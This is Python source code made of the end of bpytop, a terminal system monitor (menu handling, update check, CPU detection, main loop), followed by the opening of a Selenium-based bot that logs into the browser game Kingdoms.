out += f'{Mv.to(y+1+cy+i, x+1)}{" " * (w-2)}'
if not skip or redraw:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
redraw = True
has_sel = False
if key == "mouse_click" and not inputting:
mx, my = Key.get_mouse()
if x < mx < x + w + w2 and y - 4 < my < y:
# if my == y - 2:
for cx, cat in enumerate(categories):
ccx = x + (cat_width * cx) + round(cat_width / 2 - len(cat) / 2 )
if ccx - 2 < mx < ccx + 2 + len(cat):
key = str(cx+1)
break
elif x < mx < x + w and y < my < y + h + 2:
mouse_sel = ceil((my - y) / 2) - 1 + ceil((page-1) * (h / 2))
if pages and my == y+h+1 and x+11 < mx < x+16:
key = "page_up"
elif pages and my == y+h+1 and x+19 < mx < x+24:
key = "page_down"
elif my == y+h+1:
pass
elif mouse_sel == selected_int:
if mx < x + 6:
key = "left"
elif mx > x + 19:
key = "right"
else:
key = "enter"
elif mouse_sel < len(option_items):
selected_int = mouse_sel
has_sel = True
else:
key = "escape"
if inputting:
if key in ["escape", "mouse_click"]:
inputting = False
elif key == "enter":
inputting = False
if str(getattr(CONFIG, selected)) != input_val:
if selected == "update_ms":
if not input_val or int(input_val) < 100:
CONFIG.update_ms = 100
elif int(input_val) > 86399900:
CONFIG.update_ms = 86399900
else:
CONFIG.update_ms = int(input_val)
elif selected == "proc_update_mult":
if not input_val or int(input_val) < 1:
CONFIG.proc_update_mult = 1
else:
CONFIG.proc_update_mult = int(input_val)
Collector.proc_counter = 1
elif selected == "tree_depth":
if not input_val or int(input_val) < 0:
CONFIG.tree_depth = 0
else:
CONFIG.tree_depth = int(input_val)
ProcCollector.collapsed = {}
elif selected == "shown_boxes":
new_boxes: List = []
for box in input_val.split():
if box in ["cpu", "mem", "net", "proc"]:
new_boxes.append(box)
CONFIG.shown_boxes = " ".join(new_boxes)
Box.view_mode = "user"
Box.view_modes["user"] = CONFIG.shown_boxes.split()
Draw.clear(saved=True)
elif isinstance(getattr(CONFIG, selected), str):
setattr(CONFIG, selected, input_val)
if selected.startswith("net_"):
NetCollector.net_min = {"download" : -1, "upload" : -1}
elif selected == "draw_clock":
Box.clock_on = len(CONFIG.draw_clock) > 0
if not Box.clock_on: Draw.clear("clock", saved=True)
elif selected == "io_graph_speeds":
MemBox.graph_speeds = {}
Term.refresh(force=True)
cls.resized = False
elif key == "backspace" and len(input_val):
input_val = input_val[:-1]
elif key == "delete":
input_val = ""
elif isinstance(getattr(CONFIG, selected), str) and len(key) == 1:
input_val += key
elif isinstance(getattr(CONFIG, selected), int) and key.isdigit():
input_val += key
elif key == "q":
clean_quit()
elif key in ["escape", "o", "M", "f2"]:
cls.close = True
break
elif key == "tab" or (key == "down" and selected_int == len(option_items) - 1 and (page == pages or pages == 0)):
if cat_int == len(categories) - 1:
cat_int = 0
else:
cat_int += 1
change_cat = True
elif key == "shift_tab" or (key == "up" and selected_int == 0 and page == 1):
if cat_int == 0:
cat_int = len(categories) - 1
else:
cat_int -= 1
change_cat = True
selected_int = -1 if key != "shift_tab" else 0
elif key in list(map(str, range(1, len(cat_list)+1))) and key != str(cat_int + 1):
cat_int = int(key) - 1
change_cat = True
elif key == "enter" and selected in ["update_ms", "disks_filter", "custom_cpu_name", "net_download",
"net_upload", "draw_clock", "tree_depth", "proc_update_mult", "shown_boxes", "net_iface", "io_graph_speeds"]:
inputting = True
input_val = str(getattr(CONFIG, selected))
elif key == "left" and selected == "update_ms" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key == "right" and selected == "update_ms" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "left" and selected == "proc_update_mult" and CONFIG.proc_update_mult > 1:
CONFIG.proc_update_mult -= 1
Collector.proc_counter = 1
elif key == "right" and selected == "proc_update_mult":
CONFIG.proc_update_mult += 1
Collector.proc_counter = 1
elif key == "left" and selected == "tree_depth" and CONFIG.tree_depth > 0:
CONFIG.tree_depth -= 1
ProcCollector.collapsed = {}
elif key == "right" and selected == "tree_depth":
CONFIG.tree_depth += 1
ProcCollector.collapsed = {}
elif key in ["left", "right"] and isinstance(getattr(CONFIG, selected), bool):
setattr(CONFIG, selected, not getattr(CONFIG, selected))
if selected == "check_temp":
if CONFIG.check_temp:
CpuCollector.get_sensors()
else:
CpuCollector.sensor_method = ""
CpuCollector.got_sensors = False
if selected in ["net_auto", "net_color_fixed", "net_sync"]:
if selected == "net_auto": NetCollector.auto_min = CONFIG.net_auto
NetBox.redraw = True
if selected == "theme_background":
Term.bg = f'{THEME.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(Term.bg)
if selected == "show_battery":
Draw.clear("battery", saved=True)
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "color_theme" and len(Theme.themes) > 1:
if key == "left":
color_i -= 1
if color_i < 0: color_i = len(Theme.themes) - 1
elif key == "right":
color_i += 1
if color_i > len(Theme.themes) - 1: color_i = 0
Collector.collect_idle.wait()
CONFIG.color_theme = list(Theme.themes)[color_i]
THEME(CONFIG.color_theme)
Term.refresh(force=True)
Timer.finish()
elif key in ["left", "right"] and selected == "proc_sorting":
ProcCollector.sorting(key)
elif key in ["left", "right"] and selected == "log_level":
if key == "left":
loglevel_i -= 1
if loglevel_i < 0: loglevel_i = len(CONFIG.log_levels) - 1
elif key == "right":
loglevel_i += 1
if loglevel_i > len(CONFIG.log_levels) - 1: loglevel_i = 0
CONFIG.log_level = CONFIG.log_levels[loglevel_i]
errlog.setLevel(getattr(logging, CONFIG.log_level))
errlog.info(f'Loglevel set to {CONFIG.log_level}')
elif key in ["left", "right"] and selected in ["cpu_graph_upper", "cpu_graph_lower"]:
if key == "left":
cpu_graph_i[selected] -= 1
if cpu_graph_i[selected] < 0: cpu_graph_i[selected] = len(CONFIG.cpu_percent_fields) - 1
if key == "right":
cpu_graph_i[selected] += 1
if cpu_graph_i[selected] > len(CONFIG.cpu_percent_fields) - 1: cpu_graph_i[selected] = 0
setattr(CONFIG, selected, CONFIG.cpu_percent_fields[cpu_graph_i[selected]])
setattr(CpuCollector, selected.replace("_graph", ""), [])
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "cpu_sensor" and len(CONFIG.cpu_sensors) > 1:
if key == "left":
cpu_sensor_i -= 1
if cpu_sensor_i < 0: cpu_sensor_i = len(CONFIG.cpu_sensors) - 1
elif key == "right":
cpu_sensor_i += 1
if cpu_sensor_i > len(CONFIG.cpu_sensors) - 1: cpu_sensor_i = 0
Collector.collect_idle.wait()
CpuCollector.sensor_swap = True
CONFIG.cpu_sensor = CONFIG.cpu_sensors[cpu_sensor_i]
if CONFIG.check_temp and (CpuCollector.sensor_method != "psutil" or CONFIG.cpu_sensor == "Auto"):
CpuCollector.get_sensors()
Term.refresh(force=True)
cls.resized = False
elif key in ["up", "mouse_scroll_up"]:
selected_int -= 1
if selected_int < 0: selected_int = len(option_items) - 1
page = floor(selected_int * 2 / h) + 1
elif key in ["down", "mouse_scroll_down"]:
selected_int += 1
if selected_int > len(option_items) - 1: selected_int = 0
page = floor(selected_int * 2 / h) + 1
elif key == "page_up":
if not pages or page == 1:
selected_int = 0
else:
page -= 1
if page < 1: page = pages
selected_int = (page-1) * ceil(h / 2)
elif key == "page_down":
if not pages or page == pages:
selected_int = len(option_items) - 1
else:
page += 1
if page > pages: page = 1
selected_int = (page-1) * ceil(h / 2)
elif has_sel:
pass
else:
redraw = False
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
class Timer:
timestamp: float
return_zero = False
@classmethod
def stamp(cls):
cls.timestamp = time()
@classmethod
def not_zero(cls) -> bool:
if cls.return_zero:
cls.return_zero = False
return False
return cls.timestamp + (CONFIG.update_ms / 1000) > time()
@classmethod
def left(cls) -> float:
return cls.timestamp + (CONFIG.update_ms / 1000) - time()
@classmethod
def finish(cls):
cls.return_zero = True
cls.timestamp = time() - (CONFIG.update_ms / 1000)
Key.break_wait()
class UpdateChecker:
version: str = VERSION
thread: threading.Thread
@classmethod
def run(cls):
cls.thread = threading.Thread(target=cls._checker)
cls.thread.start()
@classmethod
def _checker(cls):
try:
with urllib.request.urlopen("https://github.com/aristocratos/bpytop/raw/master/bpytop.py", timeout=5) as source: # type: ignore
for line in source:
line = line.decode("utf-8")
if line.startswith("VERSION: str ="):
cls.version = line[(line.index("=")+1):].strip('" \n')
break
except Exception as e:
errlog.exception(f'{e}')
else:
if cls.version != VERSION and which("notify-send"):
try:
subprocess.run(["notify-send", "-u", "normal", "BpyTop Update!",
f'New version of BpyTop available!\nCurrent version: {VERSION}\nNew version: {cls.version}\nDownload at github.com/aristocratos/bpytop',
"-i", "update-notifier", "-t", "10000"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except Exception as e:
errlog.exception(f'{e}')
class Init:
running: bool = True
initbg_colors: List[str] = []
initbg_data: List[int]
initbg_up: Graph
initbg_down: Graph
resized = False
@classmethod
def start(cls):
Draw.buffer("init", z=1)
Draw.buffer("initbg", z=10)
for i in range(51):
for _ in range(2): cls.initbg_colors.append(Color.fg(i, i, i))
Draw.buffer("banner", (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(11)}{Colors.black_bg}{Colors.default}'
f'{Fx.b}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}{Color.fg("#50")}'), z=2)
for _i in range(7):
perc = f'{str(round((_i + 1) * 14 + 2)) + "%":>5}'
Draw.buffer("+banner", f'{Mv.to(Term.height // 2 - 2 + _i, Term.width // 2 - 28)}{Fx.trans(perc)}{Symbol.v_line}')
Draw.out("banner")
Draw.buffer("+init!", f'{Color.fg("#cc")}{Fx.b}{Mv.to(Term.height // 2 - 2, Term.width // 2 - 21)}{Mv.save}')
cls.initbg_data = [randint(0, 100) for _ in range(Term.width * 2)]
cls.initbg_up = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=True)
cls.initbg_down = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=False)
@classmethod
def success(cls):
if not CONFIG.show_init or cls.resized: return
cls.draw_bg(5)
Draw.buffer("+init!", f'{Mv.restore}{Symbol.ok}\n{Mv.r(Term.width // 2 - 22)}{Mv.save}')
@staticmethod
def fail(err):
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Symbol.fail}')
sleep(2)
errlog.exception(f'{err}')
clean_quit(1, errmsg=f'Error during init! See {CONFIG_DIR}/error.log for more information.')
@classmethod
def draw_bg(cls, times: int = 5):
for _ in range(times):
sleep(0.05)
x = randint(0, 100)
Draw.buffer("initbg", f'{Fx.ub}{Mv.to(0, 0)}{cls.initbg_up(x)}{Mv.to(Term.height // 2, 0)}{cls.initbg_down(x)}')
Draw.out("initbg", "banner", "init")
@classmethod
def done(cls):
cls.running = False
if not CONFIG.show_init: return
if cls.resized:
Draw.now(Term.clear)
else:
cls.draw_bg(10)
Draw.clear("initbg", "banner", "init", saved=True)
if cls.resized: return
del cls.initbg_up, cls.initbg_down, cls.initbg_data, cls.initbg_colors
#? Functions ------------------------------------------------------------------------------------->
def get_cpu_name() -> str:
'''Fetch a suitable CPU identifier from the CPU model name string'''
name: str = ""
nlist: List = []
command: str = ""
cmd_out: str = ""
rem_line: str = ""
if SYSTEM == "Linux":
command = "cat /proc/cpuinfo"
rem_line = "model name"
elif SYSTEM == "MacOS":
command ="sysctl -n machdep.cpu.brand_string"
elif SYSTEM == "BSD":
command ="sysctl hw.model"
rem_line = "hw.model"
try:
cmd_out = subprocess.check_output("LANG=C " + command, shell=True, universal_newlines=True)
except:
pass
if rem_line:
for line in cmd_out.split("\n"):
if rem_line in line:
name = re.sub( ".*" + rem_line + ".*:", "", line,1).lstrip()
else:
name = cmd_out
nlist = name.split(" ")
try:
if "Xeon" in name and "CPU" in name:
name = nlist[nlist.index("CPU")+(-1 if name.endswith(("CPU", "z")) else 1)]
elif "Ryzen" in name:
name = " ".join(nlist[nlist.index("Ryzen"):nlist.index("Ryzen")+3])
elif "Duo" in name and "@" in name:
name = " ".join(nlist[:nlist.index("@")])
elif "CPU" in name and not nlist[0] == "CPU" and not nlist[nlist.index("CPU")-1].isdigit():
name = nlist[nlist.index("CPU")-1]
except:
pass
name = name.replace("Processor", "").replace("CPU", "").replace("(R)", "").replace("(TM)", "").replace("Intel", "")
name = re.sub(r"\d?\.?\d+[mMgG][hH][zZ]", "", name)
name = " ".join(name.split())
return name
def get_cpu_core_mapping() -> List[int]:
mapping: List[int] = []
if SYSTEM == "Linux" and os.path.isfile("/proc/cpuinfo"):
try:
mapping = [0] * THREADS
num = 0
with open("/proc/cpuinfo", "r") as f:
for line in f:
if line.startswith("processor"):
num = int(line.strip()[(line.index(": ")+2):])
if num > THREADS - 1:
break
elif line.startswith("core id"):
mapping[num] = int(line.strip()[(line.index(": ")+2):])
if num < THREADS - 1:
raise Exception
except:
mapping = []
if not mapping:
mapping = []
for _ in range(THREADS // CORES):
mapping.extend([x for x in range(CORES)])
return mapping
def create_box(x: int = 0, y: int = 0, width: int = 0, height: int = 0, title: str = "", title2: str = "", line_color: Color = None, title_color: Color = None, fill: bool = True, box = None) -> str:
'''Create a box from a box object or by given arguments'''
out: str = f'{Term.fg}{Term.bg}'
num: int = 0
if not line_color: line_color = THEME.div_line
if not title_color: title_color = THEME.title
#* Get values from box class if given
if box:
x = box.x
y = box.y
width = box.width
height = box.height
title = box.name
num = box.num
hlines: Tuple[int, int] = (y, y + height - 1)
out += f'{line_color}'
#* Draw all horizontal lines
for hpos in hlines:
out += f'{Mv.to(hpos, x)}{Symbol.h_line * (width - 1)}'
#* Draw all vertical lines and fill if enabled
for hpos in range(hlines[0]+1, hlines[1]):
out += f'{Mv.to(hpos, x)}{Symbol.v_line}{" " * (width-2) if fill else Mv.r(width-2)}{Symbol.v_line}'
#* Draw corners
out += f'{Mv.to(y, x)}{Symbol.left_up}\
{Mv.to(y, x + width - 1)}{Symbol.right_up}\
{Mv.to(y + height - 1, x)}{Symbol.left_down}\
{Mv.to(y + height - 1, x + width - 1)}{Symbol.right_down}'
#* Draw titles if enabled
if title:
numbered: str = "" if not num else f'{THEME.hi_fg(SUPERSCRIPT[num])}'
out += f'{Mv.to(y, x + 2)}{Symbol.title_left}{Fx.b}{numbered}{title_color}{title}{Fx.ub}{line_color}{Symbol.title_right}'
if title2:
out += f'{Mv.to(hlines[1], x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title2}{Fx.ub}{line_color}{Symbol.title_right}'
return f'{out}{Term.fg}{Mv.to(y + 1, x + 1)}'
def now_sleeping(signum, frame):
"""Reset terminal settings and stop background input read before putting to sleep"""
Key.stop()
Collector.stop()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
os.kill(os.getpid(), signal.SIGSTOP)
def now_awake(signum, frame):
"""Set terminal settings and restart background input read"""
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Key.start()
Term.refresh()
Box.calc_sizes()
Box.draw_bg()
Collector.start()
def quit_sigint(signum, frame):
"""SIGINT redirection to clean_quit()"""
clean_quit()
def clean_quit(errcode: int = 0, errmsg: str = "", thread: bool = False):
"""Stop background input read, save current config and reset terminal settings before quitting"""
global THREAD_ERROR
if thread:
THREAD_ERROR = errcode
interrupt_main()
return
if THREAD_ERROR: errcode = THREAD_ERROR
Key.stop()
Collector.stop()
if not errcode: CONFIG.save_config()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
if errcode == 0:
errlog.info(f'Exiting. Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
else:
errlog.warning(f'Exiting with errorcode ({errcode}). Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
if not errmsg: errmsg = f'Bpytop exited with errorcode ({errcode}). See {CONFIG_DIR}/error.log for more information!'
if errmsg: print(errmsg)
raise SystemExit(errcode)
def floating_humanizer(value: Union[float, int], bit: bool = False, per_second: bool = False, start: int = 0, short: bool = False) -> str:
'''Scales up in steps of 1024 to highest possible unit and returns string with unit suffixed
* bit=True or defaults to bytes
* start=int to set 1024 multiplier starting unit
* short=True always returns 0 decimals and shortens unit to 1 character
'''
out: str = ""
mult: int = 8 if bit else 1
selector: int = start
unit: Tuple[str, ...] = UNITS["bit"] if bit else UNITS["byte"]
if isinstance(value, float): value = round(value * 100 * mult)
elif value > 0: value *= 100 * mult
else: value = 0
while len(f'{value}') > 5 and value >= 102400:
value >>= 10
if value < 100:
out = f'{value}'
break
selector += 1
else:
if len(f'{value}') == 4 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2]
elif len(f'{value}') == 3 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2:]
elif len(f'{value}') >= 2:
out = f'{value}'[:-2]
else:
out = f'{value}'
if short:
if "." in out:
out = f'{round(float(out))}'
if len(out) > 3:
out = f'{int(out[0]) + 1}'
selector += 1
out += f'{"" if short else " "}{unit[selector][0] if short else unit[selector]}'
if per_second: out += "ps" if bit else "/s"
return out
def units_to_bytes(value: str) -> int:
if not value: return 0
out: int = 0
mult: int = 0
bit: bool = False
value_i: int = 0
units: Dict[str, int] = {"k" : 1, "m" : 2, "g" : 3}
try:
if value.lower().endswith("s"):
value = value[:-1]
if value.lower().endswith("bit"):
bit = True
value = value[:-3]
elif value.lower().endswith("byte"):
value = value[:-4]
if value[-1].lower() in units:
mult = units[value[-1].lower()]
value = value[:-1]
if "." in value and value.replace(".", "").isdigit():
if mult > 0:
value_i = round(float(value) * 1024)
mult -= 1
else:
value_i = round(float(value))
elif value.isdigit():
value_i = int(value)
out = int(value_i) << (10 * mult)
if bit: out = round(out / 8)
except ValueError:
out = 0
return out
def min_max(value: int, min_value: int=0, max_value: int=100) -> int:
return max(min_value, min(value, max_value))
def readfile(file: str, default: str = "") -> str:
out: Union[str, None] = None
if os.path.isfile(file):
try:
with open(file, "r") as f:
out = f.read().strip()
except:
pass
return default if out is None else out
def process_keys():
mouse_pos: Tuple[int, int] = (0, 0)
filtered: bool = False
box_keys = {"1" : "cpu", "2" : "mem", "3" : "net", "4" : "proc"}
while Key.has_key():
key = Key.get()
found: bool = True
if key in ["mouse_scroll_up", "mouse_scroll_down", "mouse_click"]:
mouse_pos = Key.get_mouse()
if mouse_pos[0] >= ProcBox.x and ProcBox.current_y + 1 <= mouse_pos[1] < ProcBox.current_y + ProcBox.current_h - 1:
pass
elif key == "mouse_click":
key = "mouse_unselect"
else:
key = "_null"
if ProcBox.filtering:
if key in ["enter", "mouse_click", "mouse_unselect"]:
ProcBox.filtering = False
Collector.collect(ProcCollector, redraw=True, only_draw=True)
continue
elif key in ["escape", "delete"]:
ProcCollector.search_filter = ""
ProcBox.filtering = False
elif len(key) == 1:
ProcCollector.search_filter += key
elif key == "backspace" and len(ProcCollector.search_filter) > 0:
ProcCollector.search_filter = ProcCollector.search_filter[:-1]
else:
continue
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
if filtered: Collector.collect_done.wait(0.1)
filtered = True
continue
if key == "_null":
continue
elif key == "q":
clean_quit()
elif key == "+" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "-" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key in ["M", "escape"]:
Menu.main()
elif key in ["o", "f2"]:
Menu.options()
elif key in ["H", "f1"]:
Menu.help()
elif key == "m":
if list(Box.view_modes).index(Box.view_mode) + 1 > len(list(Box.view_modes)) - 1:
Box.view_mode = list(Box.view_modes)[0]
else:
Box.view_mode = list(Box.view_modes)[(list(Box.view_modes).index(Box.view_mode) + 1)]
CONFIG.shown_boxes = " ".join(Box.view_modes[Box.view_mode])
Draw.clear(saved=True)
Term.refresh(force=True)
elif key in box_keys:
boxes = CONFIG.shown_boxes.split()
if box_keys[key] in boxes:
boxes.remove(box_keys[key])
else:
boxes.append(box_keys[key])
CONFIG.shown_boxes = " ".join(boxes)
Box.view_mode = "user"
Box.view_modes["user"] = CONFIG.shown_boxes.split()
Draw.clear(saved=True)
Term.refresh(force=True)
else:
found = False
if found: continue
if "proc" in Box.boxes:
if key in ["left", "right", "h", "l"]:
ProcCollector.sorting(key)
elif key == " " and CONFIG.proc_tree and ProcBox.selected > 0:
if ProcBox.selected_pid in ProcCollector.collapsed:
ProcCollector.collapsed[ProcBox.selected_pid] = not ProcCollector.collapsed[ProcBox.selected_pid]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "e":
CONFIG.proc_tree = not CONFIG.proc_tree
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "r":
CONFIG.proc_reversed = not CONFIG.proc_reversed
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "c":
CONFIG.proc_per_core = not CONFIG.proc_per_core
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key in ["f", "F"]:
ProcBox.filtering = True
ProcCollector.case_sensitive = key == "F"
if not ProcCollector.search_filter: ProcBox.start = 0
Collector.collect(ProcCollector, redraw=True, only_draw=True)
elif key in ["T", "K", "I"] and (ProcBox.selected > 0 or ProcCollector.detailed):
pid: int = ProcBox.selected_pid if ProcBox.selected > 0 else ProcCollector.detailed_pid # type: ignore
if psutil.pid_exists(pid):
if key == "T": sig = signal.SIGTERM
elif key == "K": sig = signal.SIGKILL
elif key == "I": sig = signal.SIGINT
try:
os.kill(pid, sig)
except Exception as e:
errlog.error(f'Exception when sending signal {sig} to pid {pid}')
errlog.exception(f'{e}')
elif key == "delete" and ProcCollector.search_filter:
ProcCollector.search_filter = ""
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key == "enter":
if ProcBox.selected > 0 and ProcCollector.detailed_pid != ProcBox.selected_pid and psutil.pid_exists(ProcBox.selected_pid):
ProcCollector.detailed = True
ProcBox.last_selection = ProcBox.selected
ProcBox.selected = 0
ProcCollector.detailed_pid = ProcBox.selected_pid
ProcBox.resized = True
Collector.proc_counter = 1
elif ProcCollector.detailed:
ProcBox.selected = ProcBox.last_selection
ProcBox.last_selection = 0
ProcCollector.detailed = False
ProcCollector.detailed_pid = None
ProcBox.resized = True
Collector.proc_counter = 1
else:
continue
ProcCollector.details = {}
ProcCollector.details_cpu = []
ProcCollector.details_mem = []
Graphs.detailed_cpu = NotImplemented
Graphs.detailed_mem = NotImplemented
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key in ["up", "down", "mouse_scroll_up", "mouse_scroll_down", "page_up", "page_down", "home", "end", "mouse_click", "mouse_unselect", "j", "k"]:
ProcBox.selector(key, mouse_pos)
if "net" in Box.boxes:
if key in ["b", "n"]:
NetCollector.switch(key)
elif key == "z":
NetCollector.reset = not NetCollector.reset
Collector.collect(NetCollector, redraw=True)
elif key == "y":
CONFIG.net_sync = not CONFIG.net_sync
Collector.collect(NetCollector, redraw=True)
elif key == "a":
NetCollector.auto_min = not NetCollector.auto_min
NetCollector.net_min = {"download" : -1, "upload" : -1}
Collector.collect(NetCollector, redraw=True)
if "mem" in Box.boxes:
if key == "g":
CONFIG.mem_graphs = not CONFIG.mem_graphs
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "s":
Collector.collect_idle.wait()
CONFIG.swap_disk = not CONFIG.swap_disk
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "d":
Collector.collect_idle.wait()
CONFIG.show_disks = not CONFIG.show_disks
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "i":
Collector.collect_idle.wait()
CONFIG.io_mode = not CONFIG.io_mode
Collector.collect(MemCollector, interrupt=True, redraw=True)
#? Pre main -------------------------------------------------------------------------------------->
CPU_NAME: str = get_cpu_name()
CORE_MAP: List[int] = get_cpu_core_mapping()
THEME: Theme
def main():
global THEME
Term.width = os.get_terminal_size().columns
Term.height = os.get_terminal_size().lines
#? Init -------------------------------------------------------------------------------------->
if DEBUG: TimeIt.start("Init")
#? Switch to alternate screen, clear screen, hide cursor, enable mouse reporting and disable input echo
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
#Term.refresh(force=True)
#? Start a thread checking for updates while running init
if CONFIG.update_check: UpdateChecker.run()
#? Draw banner and init status
if CONFIG.show_init and not Init.resized:
Init.start()
#? Load theme
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Loading theme and creating colors... ")}{Mv.save}')
try:
THEME = Theme(CONFIG.color_theme)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup boxes
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Doing some maths and drawing... ")}{Mv.save}')
try:
if CONFIG.check_temp: CpuCollector.get_sensors()
Box.calc_sizes()
Box.draw_bg(now=False)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup signal handlers for SIGSTP, SIGCONT, SIGINT and SIGWINCH
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Setting up signal handlers... ")}{Mv.save}')
try:
signal.signal(signal.SIGTSTP, now_sleeping) #* Ctrl-Z
signal.signal(signal.SIGCONT, now_awake) #* Resume
signal.signal(signal.SIGINT, quit_sigint) #* Ctrl-C
signal.signal(signal.SIGWINCH, Term.refresh) #* Terminal resized
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for reading keyboard input
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting input reader thread... ")}{Mv.save}')
try:
if isinstance(sys.stdin, io.TextIOWrapper) and sys.version_info >= (3, 7):
sys.stdin.reconfigure(errors="ignore") # type: ignore
Key.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for data collection and drawing
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting data collection and drawer thread... ")}{Mv.save}')
try:
Collector.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Collect data and draw to buffer
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Collecting data and drawing... ")}{Mv.save}')
try:
Collector.collect(draw_now=False)
pass
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Draw to screen
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Finishing up... ")}{Mv.save}')
try:
Collector.collect_done.wait()
except Exception as e:
Init.fail(e)
else:
Init.success()
Init.done()
Term.refresh()
Draw.out(clear=True)
if CONFIG.draw_clock:
Box.clock_on = True
if DEBUG: TimeIt.stop("Init")
#? Main loop ------------------------------------------------------------------------------------->
def run():
while not False:
Term.refresh()
Timer.stamp()
while Timer.not_zero():
if Key.input_wait(Timer.left()):
process_keys()
Collector.collect()
#? Start main loop
try:
run()
except Exception as e:
errlog.exception(f'{e}')
clean_quit(1)
else:
#? Quit cleanly even if false starts being true...
clean_quit()
if __name__ == "__main__":
main()
|
king_bot.py
|
from .custom_driver import client
from .adventures import adventures_thread
from threading import Thread
import platform
import sys
import getopt
from .account import login
import time
from .util_game import close_welcome_screen
from .utils import log
from .farming import start_farming_thread, start_custom_farmlist_thread, sort_danger_farms_thread
from .dodge_attack import check_for_attack_thread
from .upgrade import upgrade_units_smithy_thread
from .settings import settings
from .celebration import celebration_thread
from .master_builders import master_builder_thread
#from .robber_hideouts import robber_hideout_thread
class king_bot:
def __init__(self, email: str, password: str, gameworld: str, proxy: str, start_args: list, debug: bool = False) -> None:
self.browser = client(debug=debug)
self.chrome_driver_path = settings.chromedriver_path
self.gameworld = gameworld
self.init(email=email, password=password,
proxy=proxy, start_args=start_args)
def init(self, email: str, password: str, proxy: str, start_args: list) -> None:
login_req = True
login_sleeptime = 0
manual_login = False
try:
opts, _ = getopt.getopt(
start_args[1:], "htrm:e:p:w:", ["email=", "password=", "gameworld="])
except:
print("error in arguments. check github for details.")
sys.exit()
for opt, arg in opts:
if opt == "-t":
# todo run units tests
# checks dependencies for travis
sys.exit()
elif opt == '-h':
self.browser.headless(self.chrome_driver_path, proxy=proxy)
elif opt == '-r':
self.browser.remote()
login_req = False
elif opt == '-m':
login_req = False
manual_login = True
login_sleeptime = int(arg)
elif opt in ("-e", "--email"):
email = arg
elif opt in ("-p", "--password"):
password = arg
elif opt in ("-w", "--gameworld"):
self.gameworld = arg
if self.browser.driver is None:
self.browser.chrome(self.chrome_driver_path, proxy=proxy)
if login_req:
if not email or not password or not self.gameworld:
# read login credentials
file = open(settings.credentials_path, "r")
lines = file.read().splitlines()
text = lines[0]
file.close()
if not self.gameworld:
self.gameworld = text.split(";")[0]
if not email:
email = text.split(";")[1]
if not password:
password = text.split(";")[2]
close = False
if not self.gameworld:
log("no gameworld provided")
close = True
if not email:
log("no email provided")
close = True
if not password:
log("no password provided")
close = True
if close:
sys.exit()
login(browser=self.browser, gameworld=self.gameworld,
email=email, password=password)
# clear loging credentials
email = ""
password = ""
if manual_login:
self.browser.use()
self.browser.get('https://kingdoms.com')
time.sleep(login_sleeptime)
self.browser.done()
self.browser.use()
try:
close_welcome_screen(self.browser)
except:
pass
self.browser.done()
